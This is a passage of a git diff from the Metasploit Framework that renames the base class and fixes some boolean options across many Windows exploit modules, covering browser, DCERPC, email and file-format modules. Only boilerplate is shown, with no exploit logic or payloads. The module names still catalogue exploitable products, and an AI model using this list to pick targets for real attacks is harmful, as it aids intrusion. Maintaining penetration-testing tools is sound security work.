c784f2aace..4544396f52 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_extsetowner.rb b/modules/exploits/windows/browser/trendmicro_extsetowner.rb index 8d3c754bbf..27990a4b47 100644 --- a/modules/exploits/windows/browser/trendmicro_extsetowner.rb +++ b/modules/exploits/windows/browser/trendmicro_extsetowner.rb @@ -33,7 +33,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/trendmicro_officescan.rb b/modules/exploits/windows/browser/trendmicro_officescan.rb index 94fbfcded7..ad5a5c58d1 100644 --- a/modules/exploits/windows/browser/trendmicro_officescan.rb +++ b/modules/exploits/windows/browser/trendmicro_officescan.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb index f012e29f3c..def0203920 100644 --- a/modules/exploits/windows/browser/tumbleweed_filetransfer.rb +++ b/modules/exploits/windows/browser/tumbleweed_filetransfer.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb index 8bbdc303e6..8d4387ffd8 100644 --- a/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb +++ b/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb index cdb9360048..3f80edb8c0 100644 --- a/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb +++ b/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/ultraoffice_httpupload.rb b/modules/exploits/windows/browser/ultraoffice_httpupload.rb index 05b995f2ba..d7edd41d46 100644 --- a/modules/exploits/windows/browser/ultraoffice_httpupload.rb +++ b/modules/exploits/windows/browser/ultraoffice_httpupload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/verypdf_pdfview.rb b/modules/exploits/windows/browser/verypdf_pdfview.rb index 9ad826a3e4..a3fc6e77cf 100644 --- a/modules/exploits/windows/browser/verypdf_pdfview.rb +++ b/modules/exploits/windows/browser/verypdf_pdfview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb index 5aac5af13b..aafaccaa1b 100644 --- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb +++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML @@ -39,7 +39,7 @@ class Metasploit3 < Msf::Exploit::Remote 'DefaultOptions' => { 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'false', + 'DisablePayloadHandler' => false, 'InitialAutoRunScript' => 'migrate -f' }, 'Payload' => diff --git a/modules/exploits/windows/browser/vlc_amv.rb b/modules/exploits/windows/browser/vlc_amv.rb index b6d98e0d67..e414e6fa6f 100644 --- a/modules/exploits/windows/browser/vlc_amv.rb +++ b/modules/exploits/windows/browser/vlc_amv.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/vlc_mms_bof.rb b/modules/exploits/windows/browser/vlc_mms_bof.rb index 69886b5b78..2e33ace44f 100644 --- a/modules/exploits/windows/browser/vlc_mms_bof.rb +++ b/modules/exploits/windows/browser/vlc_mms_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/webdav_dll_hijacker.rb b/modules/exploits/windows/browser/webdav_dll_hijacker.rb index 0751a93afc..7f4ca9edc9 100644 --- a/modules/exploits/windows/browser/webdav_dll_hijacker.rb +++ b/modules/exploits/windows/browser/webdav_dll_hijacker.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking # diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index a4aa0fee3e..6e337c99a7 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb index 6efae24eeb..ea7cda3260 100644 --- a/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb +++ b/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index eaba3e96eb..865b6b05f8 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote register_evasion_options( [ - OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', 'false']) + OptBool.new('PlaylistSpaceInjection', [false, 'Add junk spaces in between each entry item in the playlist"', false]) ]) end @@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote end def generate_space - if datastore['PlaylistSpaceInjection'] == true + if datastore['PlaylistSpaceInjection'] return rand_text(rand(100)+1, nil, " \t") else return '' diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index 3d2cc4191f..ffd09d661d 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb @@ -3,7 +3,7 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::TcpServer diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index 4d7d428b0a..362458f78b 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/winzip_fileview.rb b/modules/exploits/windows/browser/winzip_fileview.rb index 725d4f1f67..9ceeca87a3 100644 --- a/modules/exploits/windows/browser/winzip_fileview.rb +++ b/modules/exploits/windows/browser/winzip_fileview.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 085e90f186..e73dab9d78 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 7a0c664d80..07d4cd0d81 100644 --- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/windows/browser/xmplay_asx.rb b/modules/exploits/windows/browser/xmplay_asx.rb index 4e53c13709..151f2e87c7 100644 --- a/modules/exploits/windows/browser/xmplay_asx.rb +++ b/modules/exploits/windows/browser/xmplay_asx.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 6fdd49587e..64fa89bcaa 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 96d12e137b..b50153df05 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb index ce4d676070..c337ced797 100644 --- a/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb +++ b/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb index 6e66961670..3a30a85b77 100644 --- a/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb +++ b/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb index c96e02efd9..6f70408261 100644 --- a/modules/exploits/windows/dcerpc/ms03_026_dcom.rb +++ b/modules/exploits/windows/dcerpc/ms03_026_dcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb index 7c1644a853..b2850c5420 100644 --- a/modules/exploits/windows/dcerpc/ms05_017_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms05_017_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb index 3a1fb0408b..2cd0def19c 100644 --- a/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb +++ b/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb index dd935ca56b..a6ec6d8d85 100644 --- a/modules/exploits/windows/dcerpc/ms07_065_msmq.rb +++ b/modules/exploits/windows/dcerpc/ms07_065_msmq.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb index 6f5aa83335..2af7cccba2 100644 --- a/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb +++ b/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index 9f479be312..8fe0d02d1d 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server @@ -334,7 +334,7 @@ class Metasploit3 < Msf::Exploit::Remote msg.to = datastore['MAILTO'] msg.from = datastore['MAILFROM'] - if datastore['HTML'] == true + if datastore['HTML'] body = create_email_body_html(datastore['MESSAGE'], msg.subject) content_type = "text/html; charset=\"iso-8859-1\"" msg.add_part(body, content_type, 'quoted-printable') diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb index 609af5543f..de613c1c99 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking # This module acts as an HTTP server diff --git a/modules/exploits/windows/emc/alphastor_agent.rb b/modules/exploits/windows/emc/alphastor_agent.rb index 07697ef91d..7839770d97 100644 --- a/modules/exploits/windows/emc/alphastor_agent.rb +++ b/modules/exploits/windows/emc/alphastor_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb index 1ac3b2d0fd..8aa7292ccb 100644 --- a/modules/exploits/windows/emc/alphastor_device_manager_exec.rb +++ b/modules/exploits/windows/emc/alphastor_device_manager_exec.rb @@ -1,6 +1,6 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/emc/networker_format_string.rb b/modules/exploits/windows/emc/networker_format_string.rb index acbae74556..8c96c8ebe2 100644 --- a/modules/exploits/windows/emc/networker_format_string.rb +++ b/modules/exploits/windows/emc/networker_format_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::SunRPC diff --git a/modules/exploits/windows/emc/replication_manager_exec.rb b/modules/exploits/windows/emc/replication_manager_exec.rb index d053f2fdad..a75d439009 100644 --- a/modules/exploits/windows/emc/replication_manager_exec.rb +++ b/modules/exploits/windows/emc/replication_manager_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb index d356673194..3adf2f2f65 100644 --- a/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb +++ b/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index b5b5df41ca..3b4ad817a3 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb index d3ba10d458..8fb6d3e430 100644 --- a/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb +++ b/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/acdsee_xpm.rb b/modules/exploits/windows/fileformat/acdsee_xpm.rb index d0e2e16721..e9df444bb5 100644 --- a/modules/exploits/windows/fileformat/acdsee_xpm.rb +++ b/modules/exploits/windows/fileformat/acdsee_xpm.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb index 81a9d67736..7e7812e50e 100644 --- a/modules/exploits/windows/fileformat/actfax_import_users_bof.rb +++ b/modules/exploits/windows/fileformat/actfax_import_users_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb index b53d2e1068..7c625798f0 100644 --- a/modules/exploits/windows/fileformat/activepdf_webgrabber.rb +++ b/modules/exploits/windows/fileformat/activepdf_webgrabber.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb index 63bc9c8fcf..8e05a4b086 100644 --- a/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb +++ b/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb index 6af35d6482..b552117821 100644 --- a/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb +++ b/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 57d50e1f20..6bc77221ec 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb index f1435ffe44..5e519cd03f 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb index e73645b2ee..0ad971fa75 100644 --- a/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb +++ b/modules/exploits/windows/fileformat/adobe_flatedecode_predictor02.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_geticon.rb b/modules/exploits/windows/fileformat/adobe_geticon.rb index d67d68d24f..cb4a602a6f 100644 --- a/modules/exploits/windows/fileformat/adobe_geticon.rb +++ b/modules/exploits/windows/fileformat/adobe_geticon.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/pdf' require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb index 5e4d7de6d3..0f7e4e0a76 100644 --- a/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb +++ b/modules/exploits/windows/fileformat/adobe_illustrator_v14_eps.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb index f47602744f..9cd953b2de 100644 --- a/modules/exploits/windows/fileformat/adobe_jbig2decode.rb +++ b/modules/exploits/windows/fileformat/adobe_jbig2decode.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_libtiff.rb b/modules/exploits/windows/fileformat/adobe_libtiff.rb index 2a1bd72bf5..d7a76340f7 100644 --- a/modules/exploits/windows/fileformat/adobe_libtiff.rb +++ b/modules/exploits/windows/fileformat/adobe_libtiff.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb index 3abbfeaee9..c11e6b9043 100644 --- a/modules/exploits/windows/fileformat/adobe_media_newplayer.rb +++ b/modules/exploits/windows/fileformat/adobe_media_newplayer.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb index 49bb5b8e07..30aa1cec60 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::PDF_Parse diff --git a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb index b5658a0430..369443f74e 100644 --- a/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb +++ b/modules/exploits/windows/fileformat/adobe_pdf_embedded_exe_nojs.rb @@ -17,7 +17,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb index fd420091a1..bcb30ff04d 100644 --- a/modules/exploits/windows/fileformat/adobe_reader_u3d.rb +++ b/modules/exploits/windows/fileformat/adobe_reader_u3d.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index caa942dc5e..0a3e8b3a95 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb index a64fa5f6ba..265eb15565 100644 --- a/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb +++ b/modules/exploits/windows/fileformat/adobe_u3d_meshdecl.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/adobe_utilprintf.rb b/modules/exploits/windows/fileformat/adobe_utilprintf.rb index 03dda02143..307fefe4e6 100644 --- a/modules/exploits/windows/fileformat/adobe_utilprintf.rb +++ b/modules/exploits/windows/fileformat/adobe_utilprintf.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class MetasploitModule < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::FILEFORMAT diff --git a/modules/exploits/windows/fileformat/allplayer_m3u_bof.rb 